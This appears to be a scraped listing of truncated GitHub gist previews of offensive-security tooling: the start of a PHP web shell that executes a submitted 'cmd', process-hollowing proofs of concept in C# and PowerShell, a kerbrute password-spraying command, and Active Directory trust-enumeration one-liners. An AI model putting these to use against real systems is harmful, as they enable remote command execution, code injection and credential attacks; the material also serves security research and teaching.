This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Start-Hollow { | |
<# | |
.SYNOPSIS | |
This is a proof-of-concept for process hollowing. There is nothing new here except | |
maybe the use of NtCreateProcessEx which has some advantages in that it offers a | |
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext. | |
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's. | |
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible | |
to load the Hollow from an internal byte array straight into memory but I have not |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define AssemblyDCStart_V1 155 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> | |
#include <wmistr.h> | |
#include <evntrace.h> | |
#include <Evntcons.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Pipes; | |
using System.Threading; | |
using System.Diagnostics; | |
using System.Security.Principal; | |
using System.Security.AccessControl; | |
using System.Runtime.InteropServices; | |
using System.ComponentModel; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |